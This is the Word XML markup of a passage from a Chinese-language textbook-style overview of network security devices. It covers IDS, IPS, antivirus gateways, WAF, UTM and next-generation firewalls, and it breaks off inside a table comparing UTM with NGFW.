    <w:p w14:paraId="6097D0EF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据中心区域隔离</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B375351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局限：无法识别应用层威胁（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548412E1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lastRenderedPageBreak/>
        <w:t>2. IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（入侵检测系统）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D53460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作用：网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控摄像头</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，发现威胁并告警</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334743A2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部署：旁路镜像流量（不影响业务）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA61E3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场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538A189B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合规性审计（如等保要求）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DED5A9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击行为事后分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7AF0D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典型告警：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>警报</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP:1.1.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC36CE7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3. IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（入侵防御系统）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573591F7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作用：网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安检机</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实时阻断攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2D857A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部署：串联在网络中（延迟</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;1ms</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16665D82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场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E02F0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63B2AA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截已知漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9F8CD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操作：自动丢弃攻击包并记录日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785AB087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4. AV</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（杀毒网关）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A332626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作用：检测邮件</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页中的病毒文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274B6A6E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技术：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133EC3A6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特征码匹配（查已知病毒）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E467EE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙箱分析（检测未知威胁）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A74113D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场景：企业邮件服务器入口防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C6540F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5. WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>应用防火墙）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4093A9E0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作用：专防</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8DBD3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防护目标：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F462B9C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>OWASP TOP 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>威胁：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3203C030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>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> | XSS | CSRF | </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0B3F9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场景：电商</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>银行网站防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31353CB0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6. UTM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（统一威胁管理）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6265EE9F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作用：安全功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>瑞士军刀</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B803CEC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集成模块：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE30E9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E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spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>防火墙</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + IPS + AV + VPN + </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>上网行为管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129701D6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场景：中小型企业一体化安全防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E2225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 xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>下一代防火墙（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NGFW</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E0C725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核心进化：应用识别</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户管控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444D140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关键技术：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C5300" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>应用识别：区分微信</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抖音</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钉钉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8FD2C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户绑定：将</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联到具体员工</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05301D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容过滤：阻止敏感文件外发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4413AC0A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场景：大型企业精细化管控</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BBDDDD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">UTM vs NGFW </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>本质区别</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B4625" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UTM vs NGFW </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>本质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03"/>
        <w:gridCol w:w="3375"/>
        <w:gridCol w:w="4066"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="2700B79F" w14:textId="77777777" w:rsidTr="00501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FFED1A1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维度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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DBD05AC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b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>UTM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="229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78F7ED0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下一代防火墙（</w:t>
            </w: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NGFW</w:t>
            </w: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）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3C52B560" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="793" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6191223B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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>设计理念</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17DB189D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功能堆砌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2299" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B4BF715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深度集成</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="312B9D93" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="793" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C04E80F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rFonts w:cs="Times New Roman"/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检测引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="73476C86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多引擎串联（性能瓶颈）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2299" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="161B5229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单通道并行检测（高性能）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0E751F84" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="793" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7148F075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核心能力</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="163DB377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基础威胁防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2299" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="581A928D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应用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/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用户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/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内容深度识别</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
